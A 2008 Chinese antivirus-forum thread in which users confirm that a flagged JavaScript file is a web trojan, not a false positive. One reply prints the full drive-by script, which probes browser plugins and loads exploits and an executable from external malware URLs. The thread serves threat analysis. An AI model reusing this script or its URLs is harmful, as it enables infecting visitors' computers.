查看: 1801|回复: 9
收起左侧

[误报文件] 此JS是误报还是毒?

[复制链接]
ppkppk
发表于 2008-5-29 19:12:18 | 显示全部楼层 |阅读模式
AntivirusVersionLast UpdateResult
AhnLab-V32008.5.29.02008.05.29-
AntiVir7.8.0.192008.05.29JS/Dldr.Iframe.BB
Authentium5.1.0.42008.05.28HTML/Iframe.A!Camelot
Avast4.8.1195.02008.05.29-
AVG7.5.0.5162008.05.29-
BitDefender7.22008.05.29-
CAT-QuickHeal9.502008.05.28-
ClamAV0.92.12008.05.29-
DrWeb4.44.0.091702008.05.29-
eSafe7.0.15.02008.05.28-
eTrust-Vet31.4.58322008.05.29-
Ewido4.02008.05.29-
F-Prot4.4.4.562008.05.28-
F-Secure6.70.13260.02008.05.29-
Fortinet3.14.0.02008.05.29-
GData2.0.7306.10232008.05.29-
IkarusT3.1.1.26.02008.05.29-
Kaspersky7.0.0.1252008.05.29-
McAfee53052008.05.28-
Microsoft1.35202008.05.29-
NOD32v231432008.05.29-
Norman5.80.022008.05.28-
Panda9.0.0.42008.05.28-
Prevx1V22008.05.29-
Rising20.46.32.002008.05.29-
Sophos4.29.02008.05.29-
Sunbelt3.0.1123.12008.05.17-
Symantec102008.05.29-
TheHacker6.2.92.3222008.05.28-
VBA323.12.6.62008.05.29-
VirusBuster4.3.26:92008.05.28-
Webwasher-Gateway6.6.22008.05.29Script.Dldr.Iframe.BB

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Exia 该用户已被删除
发表于 2008-5-29 19:14:58 | 显示全部楼层
不是误报
http://bbs.kafan.cn/viewthread.php?tid=258035&extra=page%3D2

[ 本帖最后由 Exia 于 2008-5-29 19:18 编辑 ]
palfan
发表于 2008-5-29 19:19:44 | 显示全部楼层
我连不到JS里的地址

http://www.star111.net/dm1.htm?27
solcroft
发表于 2008-5-29 19:24:14 | 显示全部楼层

回复 3楼 palfan 的帖子

网马,flash漏洞,iframe,什么都有...

try{var e;
var ado=(document.createElement("object"));
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
var as=ado.createobject("Adodb.Stream","")}
catch(e){};
finally{
if(e!="[object Error]"){
document.write("<script src=http:\/\/user1.kugogo.net\/ms06014.js><\/script>")}
else{
try{var f;
var Flashver = (new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",");}
catch(f){};
finally{if(f!="[object Error]"){
if(Flashver[2] == 47){document.write('<embed src="http://user1.kugogo.net/flash1.swf"></embed>')}
if(Flashver[2] == 115){document.write('<embed src="http://user1.kugogo.net/flash2.swf"></embed>')}}}
try{var g;
var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(g){};
finally{if(g!="[object Error]"){
document.write('<iframe style=display:none src="http://user1.kugogo.net/GLWORLD.html"></iframe>')}}
try{var h;
var real=new ActiveXObject("IERPCtl.IERPCtl.1");}
catch(h){};
finally{if(h!="[object Error]"){
if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552")
{document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http:\/\/user1.kugogo.net\/real.js><\/script>')}
else{document.write('<iframe style=display:none src="http://user1.kugogo.net/Real.html"></iframe>')}}}
try{var i;
var Baidu=new ActiveXObject("BaiduBar.Tool");}
catch(i){};
finally{if(i!="[object Error]"){
Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://user1.kugogo.net/Baidu.cab", "Baidu.exe", 0)}}
if(f=="[object Error]" && g=="[object Error]" && h=="[object Error]")
{
try{if(new ActiveXObject("DPClient.Vod"))document.write('<iframe width=100 height=0 src=http://user1.kugogo.net/Thunder.html></iframe>')}catch(e){}
}}}

[ 本帖最后由 solcroft 于 2008-5-29 20:57 编辑 ]
shery0000
发表于 2008-5-29 19:25:11 | 显示全部楼层
flash马开始散开了

到处是
http://user1.kugogo.net/flash2.swf
http://user1.kugogo.net/flash1.swf
         ---> hxxp://user1.12-23.net/bak.css
palfan
发表于 2008-5-29 19:26:48 | 显示全部楼层

回复 5楼 shery0000 的帖子

MS开始爆发了 咱们见证了历史
solcroft
发表于 2008-5-29 19:31:56 | 显示全部楼层

回复 5楼 shery0000 的帖子

这个bak.css不知道到底有几个版本...

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Palkia
发表于 2008-5-29 20:38:51 | 显示全部楼层
rs 0
qigang
发表于 2008-5-29 20:40:28 | 显示全部楼层
http://user1.12-23.net/bak.css

RS20.46.32未杀!
qigang
发表于 2008-5-29 20:41:24 | 显示全部楼层

杀了!刚才不知道为什么不杀?

瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.DL.Win32.Mnless.agu

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.46.32
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-7-15 17:54 , Processed in 0.123248 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表